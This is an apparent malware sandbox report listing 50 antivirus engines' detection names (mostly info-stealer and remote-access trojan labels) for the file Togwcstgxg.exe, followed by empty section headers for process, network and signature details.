File has been identified by 50 AntiVirus engines on VirusTotal as malicious (50 events)

Lionic	Trojan.Win32.Convagent.4!c
Elastic	malicious (high confidence)
DrWeb	Trojan.Inject4.30942
MicroWorld-eScan	IL:Trojan.MSILZilla.11230
ClamAV	Win.Packed.Razy-9894224-0
FireEye	Generic.mg.7225b0d133ba9c85
CAT-QuickHeal	Trojanpws.Msil
ALYac	Gen:Variant.Tedy.344411
Malwarebytes	Trojan.Downloader
Sangfor	Suspicious.Win32.Save.ins
Alibaba	TrojanPSW:MSIL/Convagent.801cadcc
CrowdStrike	win/malicious_confidence_100% (W)
Arcabit	IL:Trojan.MSILZilla.D2BDE [many]
BitDefenderTheta	Gen:NN.ZemsilF.36132.Xn0@aWVMjTh
Cyren	W32/ABRisk.DROR-7330
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/GenKryptik.GIHC
APEX	Malicious
Paloalto	generic.ml
Cynet	Malicious (score: 100)
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	IL:Trojan.MSILZilla.11230
ViRobot	Trojan.Win.Z.Tedy.1561600
Avast	Win32:RATX-gen [Trj]
Tencent	Msil.Trojan-Spy.Stealer.Unkl
Sophos	Mal/Generic-S
F-Secure	Heuristic.HEUR/AGEN.1363500
VIPRE	IL:Trojan.MSILZilla.11230
TrendMicro	TrojanSpy.Win32.REDLINE.YXDDOZ
McAfee-GW-Edition	BehavesLike.Win32.PUP.tc
Emsisoft	Trojan.Packed (A)
Avira	HEUR/AGEN.1338066
MAX	malware (ai score=81)
Antiy-AVL	Trojan/Win32.PossibleThreat
Gridinsoft	Ransom.Win32.Wacatac.sa
Microsoft	Trojan:Win32/Tiggre!rfn
SUPERAntiSpyware	Trojan.Agent/Gen-Downloader
ZoneAlarm	HEUR:Trojan-Spy.MSIL.Stealer.gen
GData	Win32.Trojan.Ilgergop.5D60TK
Google	Detected
AhnLab-V3	Trojan/Win.Generic.R441806
McAfee	Artemis!7225B0D133BA
Cylance	unsafe
Panda	Trj/CI.A
TrendMicro-HouseCall	TrojanSpy.Win32.REDLINE.YXDDOZ
Rising	Trojan.IPLogger/NSIS!1.C696 (CLASSIC:Y7I5aeSfKzIpfmrsEtBy2w)
Ikarus	Trojan-Spy.AgentTesla
Fortinet	MSIL/GenKryptik.GIHC!tr
AVG	Win32:RATX-gen [Trj]
DeepInstinct	MALICIOUS

Togwcstgxg.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All